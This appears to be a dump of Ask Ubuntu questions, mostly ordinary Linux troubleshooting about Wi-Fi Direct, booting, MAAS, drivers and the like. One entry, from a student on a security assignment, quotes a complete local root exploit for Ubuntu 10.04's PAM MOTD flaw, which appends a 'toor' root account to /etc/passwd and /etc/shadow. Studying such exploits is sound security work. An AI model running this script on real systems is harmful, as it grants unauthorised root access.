wlan0 ) alg=0 addr= ( nil ) key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr= ( nil ) key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr= ( nil ) key_idx=3 set_tx=0 seq_len=0 key_len=0 wlan0 : rsn : flushing pmkid list in the driver nl80211 : flush pmkids wlan0 : setting scan request : 0.100000 sec wlan0 : wps : uuid based on mac address : 94f8bf7f-bad8-5fc8-87c2-05c3afbed265 eapol : supp_pae entering state disconnected eapol : supplicant port status : unauthorized nl80211 : skip set_supp_port ( unauthorized ) while not associated eapol : key_rx entering state no_key_receive eapol : supp_be entering state initialize eap : eap entering state disabled p2p : own listen channel : 6 p2p : random operating channel : 81:6 p2p : add operating class 81 p2p : channels - hexdump ( len=11 ) : 01 02 03 04 05 06 07 08 09 0a 0b p2p : add operating class 115 p2p : channels - hexdump ( len=4 ) : 24 28 2c 30 p2p : add operating class 124 p2p : channels - hexdump ( len=4 ) : 95 99 9d a1 p2p : add operating class 116 p2p : channels - hexdump ( len=2 ) : 24 2c p2p : add operating class 117 p2p : channels - hexdump ( len=2 ) : 28 30 p2p : add operating class 126 p2p : channels - hexdump ( len=2 ) : 95 9d p2p : add operating class 127 p2p : channels - hexdump ( len=2 ) : 99 a1 p2p : initialized p2p : channels : 81:1,2,3,4,5,6,7,8,9,10,11 115:36,40,44,48 124:149,153,157,161 116:36,44 117:40,48 126:149,157 127:153,161 p2p : cli_channels : wlan0 : added interface wlan0 wlan0 : state : disconnected - > disconnected nl80211 : set wlan0 operstate 0- > 0 ( dormant ) netlink : operstate : ifindex=4 linkmode=-1 ( no change ) , operstate=5 ( if_oper_dormant ) daemonize.. then i run wpa_cli and i use the commands for create a p2p group in pbc ( pusg button control ) , and the final messages of the failed connection are : 1st device : < 3 > wps-ap-available-pbc < 3 > sme : trying to authenticate with 04 : f0:21:06:1d:1f ( ssid='direct-mj ' freq=2412 mhz ) < 3 > trying to associate with 04 : f0:21:06:1d:1f ( ssid='direct-mj ' freq=2412 mhz ) < 3 > associated with 04 : f0:21:06:1d:1f < 3 > ctrl-event-eap-started eap authentication started < 3 > ctrl-event-eap-status status='started ' parameter= '' < 3 > ctrl-event-eap-proposed-method vendor=14122 method=1 < 3 > ctrl-event-eap-status status='accept proposed method ' parameter='wsc' < 3 > ctrl-event-eap-method eap vendor 14122 method 1 ( wsc ) selected < 3 > wps-cred-received < 3 > wps-success < 3 > p2p-group-formation-success < 3 > ctrl-event-eap-status status='completion ' parameter='failure' < 3 > ctrl-event-eap-failure eap authentication failed < 3 > ctrl-event-disconnected bssid=04 : f0:21:06:1d:1f reason=3 locally_generated=1 < 3 > sme : trying to authenticate with 04 : f0:21:06:1d:1f ( ssid='direct-mj ' freq=2412 mhz ) < 3 > trying to associate with 04 : f0:21:06:1d:1f ( ssid='direct-mj ' freq=2412 mhz ) < 3 > ctrl-event-regdom-change init=driver type=world < 3 > associated with 04 : f0:21:06:1d:1f < 3 > ctrl-event-disconnected bssid=04 : f0:21:06:1d:1f reason=2 < 3 > wpa : 4-way handshake failed - pre-shared key may be incorrect < 3 > ctrl-event-regdom-change init=driver type=world < 3 > ctrl-event-scan-started < 3 > ctrl-event-scan-results < 3 > wps-ap-available < 3 > p2p-group-formation-failure < 3 > p2p-group-removed wlan0 client reason=formation_failed 2nd device : < 3 > ap-enabled < 3 > ctrl-event-connected - connection to 04 : f0:21:06:1d:1f completed [ id=1 id_str= ] < 3 > p2p-group-started wlan0 go ssid= '' direct-mj '' freq=2412 passphrase= '' zphbkraf '' go_dev_addr=04 : f0:21:06:1d:1f wps_pbc > ok < 3 > wps-pbc-active < 3 > p2p-prov-disc-pbc-req 04 : f0:21:06:1d:14 p2p_dev_addr=04 : f0:21:06:1d:14 pri_dev_type=1-0050f204-1 name='giulia118 ' config_methods=0x108 dev_capab=0x21 group_capab=0x0 group=wlan0 < 3 > wps-enrollee-seen 04 : f0:21:06:1d:14 94f8bf7f-bad8-5fc8-87c2-05c3afbed265 1-0050f204-1 0x2108 4 1 [ giulia118 ] < 3 > ctrl-event-eap-started 04 : f0:21:06:1d:14 < 3 > ctrl-event-eap-proposed-method vendor=0 method=1 < 3 > ctrl-event-eap-proposed-method vendor=14122 method=254 < 3 > wps-reg-success 04 : f0:21:06:1d:14 94f8bf7f-bad8-5fc8-87c2-05c3afbed265 < 3 > wps-pbc-disable < 3 > wps-success < 3 > ctrl-event-eap-failure 04 : f0:21:06:1d:14 < 3 > wps-enrollee-seen 04 : f0:21:06:1d:14 94f8bf7f-bad8-5fc8-87c2-05c3afbed265 1-0050f204-1 0x2108 0 0 [ giulia118 ] the content of my configuration ( p2p.conf ) file is : 1st device : ctrl_interface=/var/run/wpa_supplicant ap_scan=2 fast_reauth=1 update_config=1 device_name=giulia116 device_type=1-0050f204-1 p2p_go_ht40=1 network= { ssid= '' direct_network '' psk= '' 12345678 '' proto=rsn wpa key_mgmt=wpa-psk pairwise=ccmp tkip group=ccmp tkip } 2nd device : ctrl_interface=/var/run/wpa_supplicant ap_scan=2 update_config=1 device_name=giulia118 device_type=1-0050f204-1 p2p_go_ht40=1 network= { ssid= '' direct_network '' psk= '' 12345678 '' key_mgmt=wpa-psk group=ccmp tkip } ifconfig : eth0 link encap : ethernet hwaddr 00:0d : b9:2e:1b:88 inet addr:192.168.97.116 bcast:192.168.97.255 mask:255.255.255.0 inet6 addr : fe80 : :20d : b9ff : fe2e:1b88/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2949 errors:0 dropped:0 overruns:0 frame:0 tx packets:1840 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:321032 ( 321.0 kb ) tx bytes:268766 ( 268.7 kb ) interrupt:10 base address:0xe000 eth1 link encap : ethernet hwaddr 00:0d : b9:2e:1b:89 inet addr:172.16.0.235 bcast:172.16.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20d : b9ff : fe2e:1b89/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:163951 errors:0 dropped:0 overruns:0 frame:0 tx packets:35 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17016272 ( 17.0 mb ) tx bytes:4093 ( 4.0 kb ) interrupt:15 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) mon.wlan0 link encap : unspec hwaddr 04-f0-21-06-1d-1f-30-30-00-00-00-00-00-00-00-00 up broadcast running multicast mtu:1500 metric:1 rx packets:716 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:104534 ( 104.5 kb ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 04 : f0:21:06:1d:1f inet6 addr : fe80 : :6f0:21ff : fe06:1d1f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2154 ( 2.1 kb ) tx bytes:576 ( 576.0 b ) .config : config_driver_nl80211=y config_readline=y config_ctrl_iface=y config_wps=y config_wps2=y config_p2p=y config_ap=y # config_driver_wext=y # config_driver_bsd=y # config_driver_ndis=y config_ieee8021x_eapol=y # config_eap_md5=y # config_eap_mschapv2=y config_eap_tls=y config_eap_peap=y # config_eap_ttls=y # config_eap_gtc=y # config_eap_otp=y # config_eap_sim=y # config_eap_aka=y config_eap_psk=y # config_eap_sake=y # config_eap_gpsk=y # config_eap_pax=y config_eap_leap=y # config_eap_ikev2=y # config_pcsc=y the error seems to be related to the “4-way handshake” failure . could it be that the pre-shared key is incorrect ? why i have a “group removed” ? i would appreciate any suggestion regarding the matter . thank you all in advance !
469637	is my shared parallels folder a directory ?	on my vc linux desktop there is a 'shared parallels folder ' with a padlock icon on it . i have been trying for a few weeks to command gnome terminal to direct to it . it fails to recognise this folder as a directory . i have tried quite a few commands eg , cd desktop/shared parallels folder the response is no such directory . is it to do with the padlock on the folder ? i really do n't know what to try next . i need to access files on my mac . please help !
469645	using default scroll bar	is there anyway to use the default scroll bar that is used in native ubuntu programs in other applications such as firefox ? i like how it essentially gives you a pg up/ pg down button . running ubuntu 14.04 btw .
469646	how did this exploit allow write access to root owned files ?	for a computer security assignment at my university i need to find and understand an exploit that works on ubuntu 10.04 . i have already found and tested one on an ubuntu 10.04 machine ( that i own ) this is the exploit , run as a normal user that gives you root access . taken from the offensive security website . p='toor : x:0:0 : root : /root : /bin/bash' s='toor : $ 6 $ tpurrlw7 $ m0bvnoys9fef9/lzv6pqospujokt0giv.7jngrcbwc1xdhmlbntwlkyzhz.vzwccecyqu5q2dlx.ci7nqtsnz1:14798:0:99999:7 : : : ' echo `` [ * ] ubuntu pam motd local root '' [ -z `` $ ( which ssh ) '' ] & & echo `` [ - ] ssh is a requirement '' & & exit 1 [ -z `` $ ( which ssh-keygen ) '' ] & & echo `` [ - ] ssh-keygen is a requirement '' & & exit 1 [ -z `` $ ( ps -u root |grep sshd ) '' ] & & echo `` [ - ] a running sshd is a requirement '' & & exit 1 backup ( ) { [ -e `` $ 1 '' ] & & [ -e `` $ 1 '' .bak ] & & rm -rf `` $ 1 '' .bak [ -e `` $ 1 '' ] || return 0 mv `` $ 1 '' { , .bak } || return 1 echo `` [ * ] backuped $ 1 '' } restore ( ) { [ -e `` $ 1 '' ] & & rm -rf `` $ 1 '' [ -e `` $ 1 '' .bak ] || return 0 mv `` $ 1 '' { .bak , } || return 1 echo `` [ * ] restored $ 1 '' } key_create ( ) { backup ~/.ssh/authorized_keys ssh-keygen -q -t rsa -n '' -c 'pam ' -f `` $ key '' || return 1 [ ! -d ~/.ssh ] & & { mkdir ~/.ssh || return 1 ; } mv `` $ key.pub '' ~/.ssh/authorized_keys || return 1 echo `` [ * ] ssh key set up '' } key_remove ( ) { rm -f `` $ key '' restore ~/.ssh/authorized_keys echo `` [ * ] ssh key removed '' } own ( ) { [ -e ~/.cache ] & & rm -rf ~/.cache ln -s `` $ 1 '' ~/.cache || return 1 echo `` [ * ] spawn ssh '' ssh -o 'nohostauthenticationforlocalhost yes ' -i `` $ key '' localhost true [ -w `` $ 1 '' ] || { echo `` [ - ] own $ 1 failed '' ; restore ~/.cache ; bye ; } echo `` [ + ] owned : $ 1 '' } bye ( ) { key_remove exit 1 } key= '' $ ( mktemp -u ) '' key_create || { echo `` [ - ] failed to setup ssh key '' ; exit 1 ; } backup ~/.cache || { echo `` [ - ] failed to backup ~/.cache '' ; bye ; } own /etc/passwd & & echo `` $ p '' > > /etc/passwd own /etc/shadow & & echo `` $ s '' > > /etc/shadow restore ~/.cache || { echo `` [ - ] failed to restore ~/.cache '' ; bye ; } key_remove echo `` [ + ] success ! use password toor to get root '' su -c `` sed -i '/toor : /d ' /etc/ { passwd , shadow } ; chown root : /etc/ { passwd , shadow } ; \ chgrp shadow /etc/shadow ; nscd -i passwd > /dev/null 2 > & 1 ; bash '' toor i understand why it backups files and that it generates a key for using with ssh later , and that it makes a soft link between the cache file , which is a file that the user running the script has rights to read and write , and the file that you want to take ownership . the thing i do n't understand is why is the echo `` $ p '' > > /etc/passwd and echo `` $ s '' > > /etc/shadow made on these files instead of the file cache ? was n't that the purpose of the soft link between these files and the cache file to be able to write it ? how does $ user have permission at that point in the script to write on both the shadow and passwd ? the answer clearly has to do with the ssh made to localhost , but why does this ssh grant these permissions ? after that i get what happens , once both files are modified then the user toor has root permissions and is summoned with the su command . my main problem is understanding with ssh -o 'nohostauthenticationforlocalhost yes ' -i `` $ key '' localhost true lets you gain write permissions on both the shadow and the passwd .
469647	transmission started to detect torrents bigger than they are ?	when i add a torrent the program in transmission it shows size larger than actual size ( for example , if i add a torrent file of size 814 mb in transmission it shows its size is 854 mb and it downloads 854 mb of data ) .but when i use îźtorrent it only shows 814 mb and it downloads 814 mb only . transmission version:2.82 can anybody help me to suggest exact problem and how can i solve this .
469649	setting up maas on 14.04lts region + cluster on same server dhcp not working	first time trying out maas ( want openstack dev/test under cloud setup using maas ) . i want lab net < - > ( eth0 ) maas region & cluster server ( eth1 ) [ dhcp/dns ] < - > isolated net . i installed via 14.04 lts installer selected maas and after a couple hiccups i believe i have things mostly working ( ui available ) but i ca n't get dhcp on the isolated network . one thing that troubles me is that i can not ping the eth1 address of the cluster server . i would appreciate troubleshooting tips for maas in general , things to look for in logs etc . from the cluster system i can ping it 's own eth1 address but am getting destination host unreachable for others on the ( eth1 ) 192.0.2.0 network . # cat /etc/network/interfaces ... # the primary network interface # this is an autoconfigured ipv6 interface auto eth0 iface eth0 inet static # iface eth0 inet6 auto address 10.80.xxx.50 netmask 255.255.254.0 network 10.80.xxx.0 broadcast 10.80.xxx.255 gateway 10.80.xxx.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers xxx.xxx.xx.132 xxx.xx.xxx.52 xxx.xx.xxx.41 dns-search xxx.com auto eth1 iface eth1 inet static address 192.0.2.10 netmask 255.255.255.0 up ip route add 192.0.2.0/24 via 192.0.2.1 || true # ip addr 3 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up group default qlen 1000 link/ether 00:1e:68:9b:2f:6c brd ff : ff : ff : ff : ff : ff inet 192.0.2.10/24 brd 192.0.2.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80 : :21e:68ff : fe9b:2f6c/64 scope link valid_lft forever preferred_lft forever # ip route default via 10.80.208.1 dev eth0 10.80.208.0/23 dev eth0 proto kernel scope link src 10.80.208.50 192.0.2.0/24 dev eth1 proto kernel scope link src 192.0.2.10
469651	mobile broadband not enabling	i am using a qualcom broadband ( evdo ) dongle on ubuntu 13.04 . i have used this dongle well for a number of days on ubuntu 13.04 but recently i had to do a fresh install of ubuntu 13.04 but when i try to use the dongle the option for enable mobile broadband keeps unchecking itself and i get a `` not enabled '' as the name of my connection . after a few tries of checking the enable mobile broadband option i get this error : '' creating object path /org/freedesktop/networkmanager/activeconnection/6 failed in libnm-glib ''
469652	should i forcefully uninstall ubuntu-minimal : depends : resolvconf as it has unmet dependencies	my ubuntu software center was not working and i was trying to fix it . i ran the following series of commands : sudo apt-get update this one failed and this was the result err http : //extras.ubuntu.com quantal inrelease err http : //us.archive.ubuntu.com quantal inrelease err http : //us.archive.ubuntu.com quantal-updates inrelease err http : //us.archive.ubuntu.com quantal-backports inrelease err http : //extras.ubuntu.com quantal release.gpg unable to connect to 192.168.0.2:3128 : err http : //us.archive.ubuntu.com quantal release.gpg unable to connect to 192.168.0.2:3128 : err http : //us.archive.ubuntu.com quantal-updates release.gpg unable to connect to 192.168.0.2:3128 : err http : //us.archive.ubuntu.com quantal-backports release.gpg unable to connect to 192.168.0.2:3128 : err http : //security.ubuntu.com quantal-security inrelease err http : //security.ubuntu.com quantal-security release.gpg unable to connect to 192.168.0.2:3128 : reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : f ailed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 192.168.0.2:3128 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 192.168.0.2:3128 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to 192.168.0.2:3128 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to 192.168.0.2:3128 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to 192.168.0.2:3128 : w : some index files failed to download . they have been ignored , or old ones used instead . then i ran these commands sudo apt-get autoclean sudo apt-get clean and when i ran the command sudo apt-get autoremove , i got the following result : '' reading package lists ... done building dependency tree reading state information ... done you might want to run `'apt-get -f install'` to correct these . the following packages have unmet dependencies : ubuntu-minimal : depends : resolvconf e : unmet dependencies . try using -f. '' so should i forcefully uninstall ubuntu-minimal : depends : resolvconf
469654	converting .rm to .flv using terminal ?	is there anyway to convert .rm to .flv using terminal ? because .rm file is not running in mplayer in my ubuntu 12.04 . os detail : linux hp-cq40 3.8.0-39-generic # 58~precise1-ubuntu smp fri may 2 21:33:17 utc 2014 i686 i686 i386 gnu/linux
469658	moonlight not working on chromium	today i tried to install moonlight plugin for chromium ( novell-moonlight-3.99.0.3-x86_64.crx ) . it says it 's installed but when i try to open sites requiring silverlight it shows the `` get silverlight '' button . i do n't know how to fix this and i really want to keep using chromium instead of firefox thanks , michael edit : i have n't tried it on firefox yet
469661	glance and ceph hook-failed `` ceph-relation chaged ''	i have installed glance in one machine and ceph in another machine using juju . ceph is running on one machine but i try to establish a relation between glance and ceph it always shows hook-failed . i have checked the glacne log file it says the following but i can access ceph from glance machine . moreover , i have observed the ceph.conf file i saw the mon host is specified . i dont't understand why the errors appears ? info ceph-relation-changed unable to find any monitors in conf . please specify monitors via -m monaddr or -c ceph.conf 2014-05-20 14:57:20 info ceph-relation-changed could n't connect to cluster ! error -2 2014-05-20 14:57:20 info ceph-relation-changed unable to find any monitors in conf . please specify monitors via -m monaddr or -c ceph.conf 2014-05-20 14:57:20 info ceph-relation-changed could n't connect to cluster ! error -2 2014-05-20 14:57:20 info ceph-relation-changed unable to find any monitors in conf . please specify monitors via -m monaddr or -c ceph.conf 2014-05-20 14:57:20 info ceph-relation-changed error connecting to cluster : objectnotfound 2014-05-20 14:57:20 info ceph-relation-changed traceback ( most recent call last ) :
469664	wifi drivers for lenovo thinkpad l440	i recently got a lenovo thinkpad l440 and the wifi drivers seems to be broken . i am using ubuntu 13.10 relevant output of lspci -nn : 00:19.0 ethernet controller [ 0200 ] : intel corporation ethernet connection i217-v [ 8086:153b ] ( rev 05 ) 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:818b ] 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device [ 10ec:5227 ] ( rev 01 ) i tried the steps mentioned here , but had no luck with it . any way to get the wifi working .
469667	mouse and touchpad settings missing	i am using the latest version of ubuntu 14.04 in the new lenovo z510 ideapad laptop . i came across this problem while i was trying to enable my two-finger swipe action . usually the mouse and touchpad setting will have separate columns for mouse and touchpad as shown here : from this link whereas in my case there is no two parts . just one , as shown . now can i get my settings back to normal , as shown here ? also , is it possible to enable both edge scrolling and two-finger scrolling without the use of third party apps like touchegg ? if so , how ?
469671	libreoffice indent table of content	i 'm writing an essay and use 2,5 cm text indent . the original is 2 cm . but whenever i create a table of content that content goes back to 2 cm , and i have n't found a way to indent it .
469673	i am unable to change the permissions of my `` shared parallels folder '' as it is owned by root . how do i change this ?	i would like to change the owner 'root ' within in my `` shared parallels folder '' s properties , so that i will be able to change the permissons of that shared folder . as i am having problems commanding the gnome terminal to that directory , this could be the reason why . anyone know how ?
469674	ubuntu 14.04 lts download size 67 mb ?	i want to download ubuntu 14.04 lts for 32-bit , but it 's only 67 megabytes . is that true ?
469675	about tuxlol on linux	i read about your article comment in which you solved all the problems with the current league of legends , my question to you might be quite silly considered your level and experience with all these stuff but i 'd love to get an answer since i ca n't get the game running on my pc . i installed it via playonlinux and did nothing else at first , the game client worked , i could chat but not go to store but it was ok. yet when i tried to open the game , the leagueoflegends banner stuck and went grey . then i stumbled upon your guide . tried to do things that way , yet still cant patch the tuxlol thing . i got the packages but when i enter the tuxlol patching command , it says it is aborted ( core dumped ) . dont know what to do , if you came across this problem or even have an idea of how to solve it i 'd be very glad . thanks
469676	how can i get ubuntu ? . i cant download it	ever since i got my laptop , i have been wanting to explore ubuntu . but unluckily , i ca n't download it because i do not have an internet connection . i have tried many times , but downloading it from cyber cafes is not possible . is there any solution to this problem ?
469679	i am not able to install anything as i get always the message 'the list of sources could not be read ' ( it seems to be a problem on line 3 )	i dont really understand much about ububntu and i am not able to repair , neither update ubuntu.. and not even load a windows usb to change os . i have tried to do several things and for instance when running sudo apt-get update i have the following answer e : type 'untu/boot-repair/ubuntu ' is not known on line 3 in source list /etc/apt/sources.list.d/yannubuntu-boot-repair-precise.list e : the list of sources could not be read .
469688	unable to claim interface : resource busy	i am working with usb4java ( the low-level version ) and am basically working from this code here . i was running into a problem about permissions but was able to resolve by running eclipse using gksu from the terminal . now i am having a new problem : when i get to the point in the code here : public static void claimdevice ( devicehandle handle , int interfacenum ) { int r = libusb.claiminterface ( handle , interfacenum ) ; . . . i 'm getting an exception telling me that the `` resource is busy '' : usb error 6 : unable to claim interface : resource busy i 've used ubuntu before ( but never for development so i 'm really new to this ) . if this is n't where this question should be handled then please tell me where to take it so i can get an answer . specifically , the question is , what does this mean and how can i resolve it ? my goal , in this case , this being a custom usb device , is to create a low-level cross-platform ... java based ... `` driver '' ( using that term loosely ) . i 'm working with ubuntu right now because the terminal lsusb command gives a good amount of information on the device in question .
469689	printing on a network	i am having problem printing to any printer at my workplace . the office use windows all around . even as i see the printers listed in my network settings , i can not address them to do anything . the time indicator just spins and spins with no result .
469690	unity launcher in 14.04 problem	my ubuntu 14.04 menu behaviour seems to have gone awry . i used to be able to access miniature versions of more than one window in the same app simultaneously . a further example : when thunderbird is in the process of sending a long mail with attachments , i used to be able to click on the thunderbird launcher icon to see miniatures of all the open thunderbird windows , then i could click on the inbox miniature window and go there while the mail is still being sent on the other window . now i have to wait until the mail is sent off before i can access the inbox . the other feature coupled to this , that i miss , is when more than one website is open in firefox , there used to be the corresponding number of pointers in the icon , showing that multiple sites are open . again , i could simply click on the launcher icon and could then see miniatures of all the open sites to select the one i wanted . how do i get this feature back , please can someone help ?
469693	installation error ( 14.04 ) : serious errors were found while checking the disk for /	everytime when i try to install ubuntu 14.04 there is a message saying there are serious errors while checking for drive / . it also says some files are not ready yet or no present . i have tried ubuntu 13 and that does n't work too but ubuntu 12 works . what can i do ?
469695	mobile ( cellular ) phone internet connection daemon name	while i am mobile , sometimes i need to use the mobile ( cellular ) phone internet connectivity . ( i have followed the procedure chalked out here . ) but sometimes , the connection option disappears from the pull down menu . in some cases , physically disconnecting the phone from cable and then reconnecting it brings the connection name back . but when luck runs out , the only option i am left with is rebooting the machine . my hunch is , some daemon dies which was in charge of watching the connection . if i can ( re ) start that daemon , things should be alright again . this is what should be happening while i am restarting my machine . but i have failed to find the name of the relevant daemon ( process ) name . restarting the network daemon did not help . do you think you can tell me the name ?
469697	how to install ubuntu 14.04 lts on windows 8 ?	i own hp j110tx laptop running windows 8 on it . i want to install ubuntu 14.04 lts along side windows . i have downloaded ubuntu-14.04-desktop-i386 iso . i tried creating bootable usb drive through different softwares available online . it succeeds till here , but when i try to boot from usb it fails . it directly boots to windows . i have changed by boot order and given priority to usb . but still it fails..dunno where its going wrong.. kindly see the attached image of boot options . thanx for the reply..i tried both the methods but cudnt succeed . i am really not sure where it going wrong..i also disabled fastboot but problem persists . i dont think anything is wrong with the iso coz universal usb installed did check for its integrity before making it bootable.. what could be the problem ?
469701	weird partial screen flickering after upgrade to 14.04	i have been bothered by this issue for few weeks already . the problem started when i upgraded to 14.04 . parts of my screen are sometimes flickering like shown on 2 videos that links i attach below : https : //www.youtube.com/watch ? v=fag2ugabxqo https : //www.youtube.com/watch ? v=angal28p-ye i was trying to record it with vlc but suddenly when i start recording then ... it stops flickering : ) i have no idea where can i file a bug for this and which package it may be connected with . please comment with what it may be connected with and how can i resolve this . i will post any relevant information regarding the packages if need be . i use nvidia-334 from xorg edgers package ( 334.21-0ubuntu1~xedgers14.04.1 ) but i have also tried others and it 's the same issue .
469703	which version of ubuntu on celeron with 1gb ram is suitable ?	my computer has the configuration as follows : intel celeron processor 1gb ram nvidia graphics support . which version of ubuntu will be suitable to develop drivers , kernel modules related works on my system ?
469704	cve-2014-0196 and grs kernel	my client is renting a server in ovh . everyone knows about ovh and their default kernel from grs ( ( can anybody say if the kernel 3.2.13-grsec-xxxx-grs-ipv6-64 is affected to cve-2014-0196 ( not openssl ! ! ) or where i can find more info about this magic kernel ? thank you !
469706	constant hum when using gstreamer-tools	i recently was researching how to connect my computer to an amateur radio and hear the radio through the computer . on this site i found an answer . someone suggested to download gstreamer-tools . for a while it worked great , but now there is a constant humming noise . the command i use to start gstreamer-tools is : gst-launch pulsesrc ! pulsesink how do i fix this problem ? thank you again everyone for all of your support .
469709	gradle compiling slows down my computer	the responsiveness is really bad on a newly installed ubuntu 14.04 lts . here 's the specs of my laptop : quadcore intel i7-4600u cpu @ 2.10ghz 12gb ram 1tb samsung evo ssd and when gradle is compiling , my entire system slows to a crawl , videos begin stuttering , browser scrolling lags ... etc . the same goes when a page refresh occurs in another window in chrome , and while it refreshes , the html5 video in another tab begins stuttering . how can i fix this ? here are some logs : $ vmstat -a 1 5 - http : //paste.ubuntu.com/7493966/ $ iostat -x 1 5 - http : //paste.ubuntu.com/7493970/ $ top -b - http : //paste.ubuntu.com/7493974/
469710	ubuntu for tablets on surface pro x.x	i wanted to know whether the surface pro ( insert version ) is considered to be a tablet or a desktop in the ubuntu phone/tablet/desktop framework . in other words will it have the desktop interface with the keyboard attached and the tablet interface without it ? could anyone point me to any resources that outline the desktop/tablet distinction ?
469715	need help configuring server for accessing it with putty	i 'm new to linux and i just recently installed ubuntu 14.04 lts ( 32 bit ) on a vm ( virtualbox ) . i followed every step as described on this site and other forums so i managed to install it . now i need help to configure ip address and ssh so that i can access it with putty on windows to linux ( on vm ) . i need a step by step guide regarding this . i tried some methods but did n't have luck so i need someone who 's already experienced and has done this to show me because its very important for me to set this up . if someone can help me i 'll give my teamviewer id so that i can follow instructions and see how it is done . it would really mean to me and i would be very grateful . ok ... thanks for answers ... .but i already done this sudo apt-get install openssh-server after that i did sudo service ssh restart i also did sudo apt-get update i now configured static ip and also port 22 is listened , but in putty i have problem which is `` connection refused '' .it ca n't connect ... i just tried this earlier and this happens over and over again.i tried to find answers how to solve that issue but didnt have luck , so thats why i 'm asking someone to show me that directly on my local machine . i get errors like connection refused or connection timed out . dont know how to solve this . thanks in advance . dusan .
469716	build-essential and module assistant packages on ubuntu iso	does the iso image of ubuntu 14.04 contain the build-essential and module assistant packages ? is there any way that i can download them separately and add them later , after the installation ?
469718	unable to find windows partitions after installing ubuntu	i 've just installed ubuntu 14.04 and i was also using windows 8 . i was preparing an un-allocated partition of 25 gb from windows to ubuntu . in the installation of ubuntu i did not find the option of `` install ubuntu alongside windows 8 '' , so i 've chosen `` something else '' & selected sda then clicked new partition table , created a swap area around 4gb . finally the rest partitioned as root for the system with size of 20gb . once the installation finished ; neither can i boot into windows nor find my ntfs partitions ( c , d , e ) .
469719	boot takes a long time after the upgade from 12.04 to 14.04 lts	i used the system 's upgrader to get into the newer ubuntu lts version . everything went fine but now my acer chromebook takes forever to boot . any suggestions ?
469721	how much ram is this application using ?	if i run top -c or htop i get processes with their memory consumption , but it is not what i want to see . is there a command line that allows to see the ram consumption of a given application ? for example , i want to see the ram consumption of apache web server ( not by checking all the processes it runs , instead )
469725	restore xubuntu dock	i 've installed xubuntu desktop on ubuntu 14.04 from the reppositores with sudo apt-get install xubuntu-desktop , and i see that the dock does n't appear , how can i restore it ?
469728	ca n't boot to installed ubuntu	i tried to install another os on my computer , but something terrible happened . now i ca n't boot into installed ubuntu . i tried to install ubuntu on another partition , it succeed . but after rebooting , it automatically boots into usb installation , can not read installed systems . at the boot menu , i ca n't select booting os as 1st boot option , or 2nd ! it always boots into usb and if usb is not plugged in , it shows errors and does n't open anything . my computer is asus . i do n't know what actually is it 's model . -- - my father solved the problem , thanks for the support . if you live the same issue , try to reset boot settings to default : ) -- -
469729	ubuntu 14.04 scrollbar `` universal '' color changer	i 'm on ubuntu 14.04 using the default settings and on the ambiance theme . i have installed gnome color chooser to change the normal ( or `` legacy '' ) scrollbar color . in gnome color chooser in the specific tab > i have changed normal color hover color button pressed on windows such as compizconfig settings manager i can see the scrollbar color the way i changed it . but on the nautilus , terminal ( which is the biggest issue , ca n't see the scrollbar ) and windows like chrome , firefox the color setting do not appear for the scrollbar . is there a way to have the color on the scrollbar change `` universal '' for all windows , especially the terminal ? -thank you in advance .
469730	speed up ubuntu on sd card	i am running ubuntu 14.04 off an sd card after a computer 's hard drive went bad and we only need it to play a video on a loop anyways . the sd card is class 4 . are there any tricks to speed up ubuntu or optimize it for a slow disk ?
469735	increase text size in list display	in list display text size is much smaller than icon size . with very small zoom ( 30 % ) text proportion looks good to me , although everything is too small ; - ) then increasing size , text size lags size of icons ! i really need larger text . any tweak for nautilus text and its scaling relative to icon size please ?
469738	wireless keyboard + mouse combo for use with ubuntu and windows .	i am looking for a set of keyboard and mouse that : are wireless are compatible with ubuntu and windows do n't use disposable batteries ( maybe internal storage that gets reloaded through usb , like playstation 3 controllers ? ) any recommendations ?
469744	mouse cursor flickering and disappearing but no unknown monitor	i installed ubuntu 12.04 few days ago . everything was ok . but suddenly the mouse cursor has started flickering and disappearing . i have searched through this community and found some solution like this which suggest to disable unknown monitor from settings- > display . but there is no unknown monitor ! . please refer the screenshot below ; how can i fix this problem ? please advise .
